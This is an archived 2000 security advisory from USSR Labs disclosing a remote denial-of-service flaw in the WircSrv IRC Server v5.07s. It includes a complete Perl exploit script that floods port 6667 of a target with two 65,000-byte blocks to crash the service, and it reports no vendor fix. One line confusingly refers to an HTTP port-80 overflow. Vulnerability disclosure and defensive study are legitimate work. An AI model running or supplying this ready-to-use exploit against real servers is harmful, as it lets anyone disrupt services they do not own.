OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Remote DoS Attack in WircSrv Irc Server v5.07s Vulnerability
From: Ussr Labs (labsUSSRBACK.COM)
Date: Mon Jul 10 2000 - 08:46:01 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Remote DoS Attack in WircSrv Irc Server v5.07s Vulnerability

"THE KING IS THE NEXT RELEASE"

USSR Advisory Code: USSR-2000049

Release Date:
July 10, 2000

Systems Affected:
WircSrv Irc Server v5.07s

THE PROBLEM

The Ussr Labs team has recently discovered a buffer overflow memory
problem in the WircSrv Irc Server.
What happens is by performing an attack with a malformed request to
port 6667 it will cause the process containing the services to stop
responding.

SPECIAL NOTE: That we take no responsibility for this code it is for
educational purposes only.

Example:
The http Server (Port 80) service has an overflow in the GET command

[hellmedie-communitech.net$ telnet irc.example.com 6667
Trying example.com...
Connected to example.com.
Escape character is '^]'.
[buffer]

Where [buffer] is approx. 65000 characters, and the process containg
the service crashes

Code in Perl:
wircsrvdos.pl
- -------------------------Start File--------------------
#!/usr/bin/perl
#########################################################
# Exploit by USSRLabs www.ussrback.com
# WircSrv Version 5.07s Remote DoS attack
# send 2 64k blocks of data causes the server to crash.
#########################################################
use Getopt::Std;
use Socket;

getopts('s:', \%args);
if(!defined($args{s})){&usage;}

my($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$proto);

$foo = "A"; # this is the NOP
$number = "65000"; # this is the total number of NOP
$data .= $foo x $number; # result of $foo times $number
$serv = $args{s}; # remote server
$port = 6667; # remote port, default is 6667
$buf = "$data"; # issue this response to the server

$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
connect(S, $paddr) ||die ("Error: $!");
select(S); $| = 1; select(STDOUT);
print S "$buf";
print S "$buf";
print("Data has been successfully sent to $serv\n");

sub usage {die("\n\nExploit by USSRLabs www.ussrback.com\nWircSrv
Version 5.07s
Remote DoS attack\nsend 2 64k blocks of data causes the server to
crash.\n -s server_ip\n\n");}
- -------------------------End File----------------------

Vendor Status:
Informed!

Fix:
No Fix

Vendor Url: http://www.wircsrv.com/
Program Url: http://www.wircsrv.com/wirc507s.exe

Related Links:

Underground Security Systems Research:
http://www.ussrback.com

CrunchSp Product:
http://www.crunchsp.com

Greetings:
Attrition, w00w00, beavuh, Rhino9, Synnergy.net, SecurityFocus.com,
ADM, HNC, #Synnergy (efnet),#hackphreak (efnet), Technotronic, dethy,
RFP and Wiretrip.

Copyright (c) 1999-2000 Underground Security Systems Research.
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of Ussr. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please e-mail
labsussrback.com for permission.

Disclaimer:
The information within this paper may change without notice. We may
not be held responsible for the use and/or potential effects of these
programs or advisories, use them and read them at your own risk or
not at all. You solely are responsible for this judgement.

Feedback:
Please send suggestions, updates, and comments to:

Underground Security Systems Research
mail:labsussrback.com
http://www.ussrback.com

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com>

iQA/AwUBOWnTma3JcbWNj6DDEQLJjACdGYhvnuXJUwQgqEAUK8PVvY9bchwAoJTj
rO6kNaijTNS1zQCNQQ6NLI9z
=dclH
-----END PGP SIGNATURE-----